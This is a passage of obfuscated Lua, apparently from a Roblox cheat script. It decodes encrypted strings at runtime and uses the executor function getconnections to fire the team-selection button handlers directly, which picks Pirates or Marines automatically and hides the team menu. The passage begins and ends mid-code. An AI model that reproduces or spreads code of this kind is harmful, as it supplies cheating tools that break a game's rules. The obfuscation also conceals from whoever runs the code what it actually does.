v263,v264 in pairs({v7("\243\168\208\206\118\211\72\26\202\168\203\140\80\253\84\13\213","\110\190\199\165\189\19\145\61"),v7("\247\228\98\251\142\229\207\255\99\231\133\150\254\228\96\230","\167\186\139\23\136\235"),v7("\59\182\156\4\12\180\156\8\30","\109\122\213\232")}) do for v265,v266 in pairs(getconnections(game:GetService(v7("\222\251\163\41\235\229\177","\80\142\151\194")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Pirates.Frame.ViewportFrame.TextButton[v264])) do v266.Function();end end elseif (_G.Team==v7("\46\199\101\69\13\195\100","\44\99\166\23")) then for v267,v268 in pairs({v7("\81\248\60\37\54\134\105\227\61\57\61\245\95\251\32\53\56","\196\28\151\73\86\83"),v7("\222\12\60\3\135\122\13\98\231\12\39\65\166\87\15\120","\22\147\99\73\112\226\56\120"),v7("\153\118\246\252\155\185\97\231\241","\237\216\21\130\149")}) do for v271,v272 in pairs(getconnections(game:GetService(v7("\178\66\94\70\181\219\77","\62\226\46\63\63\208\169")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v268])) do v272.Function();end end else for v269,v270 in pairs({v7("\200\22\64\144\26\47\58\74\241\22\91\210\60\1\38\93\238","\62\133\121\53\227\127\109\79"),v7("\61\27\39\230\211\140\183\4\0\61\251\135\138\173\7\26","\194\112\116\82\149\182\206"),v7("\24\171\88\17\214\227\26\60\172","\110\89\200\44\120\160\130")}) do for v273,v274 in pairs(getconnections(game:GetService(v7("\155\207\74\95\70\88\40","\45\203\163\43\38\35\42\91")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v270])) do v274.Function();end end end break;end end end);break;end end until join==true  game:GetService(v7("\226\137\221\58\130\187\71","\52\178\229\188\67\231\201")).LocalPlayer.PlayerGui.Main.ChooseTeam.Visible=false;break;end end break;end end end
